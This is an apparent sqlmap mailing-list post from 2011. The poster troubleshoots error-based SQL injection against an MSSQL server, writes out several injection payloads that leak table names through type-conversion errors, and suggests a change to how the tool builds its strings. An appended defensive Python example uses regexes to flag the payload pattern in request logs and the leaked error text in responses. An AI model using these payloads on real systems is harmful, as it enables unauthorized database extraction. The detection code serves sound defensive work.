[sqlmap-users] Concatenating sub-queries with strings
From: execute <ex...@gm...> - 2011-05-07 17:46:26
Hey, I'm using the error-based technique for extracting data from an MSSQL server (2005 - 9.00.4053.00). It seems like concatenating the sub-query with a string doesn't work well - for some reason, the webserver returns the regular response for "row not found" instead of throwing an error. I tested it manually and found the following:

- ') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U')) --
  Works well - throws an error with a table name ("Conversion failed when converting the nvarchar value 'TABLE-NAME' to data type int.")

- ') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE xtype = 'U')) --
  Works well - throws an error with a table name ("Conversion failed when converting the nvarchar value 'x:TABLE-NAME' to data type int.")

- ') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U')) --
  Doesn't work - just returns 'page not found' (not a 404 error, an error from the script telling that no rows were found)

Can anyone test and confirm this? I'm not quite sure why that happens, but it seems like it can easily be fixed by adding the strings inside the sub-query (SELECT ':foo'+...+':bar:') instead of outside of it as it does now.

Thanks
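From the defender's side, the technique discussed in the post leaves two signals: the CONVERT(INT,(SELECT ...)) idiom in the request, and the verbose "Conversion failed when converting the nvarchar value '...'" message in the response that leaks the converted value. The following is an added example, not code from the thread or from sqlmap, that checks both over constructed sample log lines; the request and response lines and their paths are made up for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log request lines (hypothetical paths, not from the thread).
SAMPLE_REQUESTS = [
    "GET /item.asp?id=1 HTTP/1.1",
    "GET /item.asp?id=1%27%29+AND+3792%3DCONVERT%28INT%2C%28SELECT+TOP+1+name"
    "+FROM+sysobjects+WHERE+xtype+%3D+%27U%27%29%29+--+ HTTP/1.1",
    "GET /item.asp?id=1%27%29+AND+3792%3DCONVERT%28INT%2C%27x%3A%27%2B%28SELECT"
    "+TOP+1+name+FROM+sysobjects%29%29+--+ HTTP/1.1",
    "GET /search.asp?q=convert+cash HTTP/1.1",  # benign use of the word "convert"
]

# Constructed sample response bodies (the first two mirror the error text quoted in the post).
SAMPLE_RESPONSES = [
    "<html>Conversion failed when converting the nvarchar value 'TABLE-NAME' to data type int.</html>",
    "<html>Conversion failed when converting the nvarchar value 'x:TABLE-NAME' to data type int.</html>",
    "<html>Sorry, no rows were found.</html>",
]

# Request-side signature: CONVERT(INT, ...) wrapped around a sub-SELECT, tolerant of
# whitespace and of a string prefix glued on outside the sub-query, e.g. 'x:'+(SELECT ...).
CONVERT_SUBSELECT = re.compile(
    r"CONVERT\s*\(\s*INT\s*,\s*(?:'[^']*'\s*\+\s*)?\(\s*SELECT\b", re.IGNORECASE)

# Response-side signature: the MSSQL conversion error echoed verbatim, which is what
# turns a failed cast into a data-disclosure channel. The captured group is the leaked value.
LEAKED_CONVERSION = re.compile(
    r"Conversion failed when converting the n?varchar value '(?P<leak>[^']*)' to data type int",
    re.IGNORECASE)


def flag_requests(lines):
    """Return (line_index, decoded_path) for each request carrying the CONVERT/sub-SELECT idiom."""
    hits = []
    for i, line in enumerate(lines):
        parts = line.split(" ", 2)
        if len(parts) < 2:
            continue  # not a "METHOD path HTTP/x" line
        decoded = unquote_plus(parts[1])  # decode %xx and '+' before matching
        if CONVERT_SUBSELECT.search(decoded):
            hits.append((i, decoded))
    return hits


def leaked_values(responses):
    """Return the values disclosed by verbose conversion errors in response bodies."""
    return [m.group("leak") for body in responses for m in LEAKED_CONVERSION.finditer(body)]
```

Any non-empty result from leaked_values means the application is relaying database error text to the client; returning a generic error page removes that channel regardless of which payload variant is used.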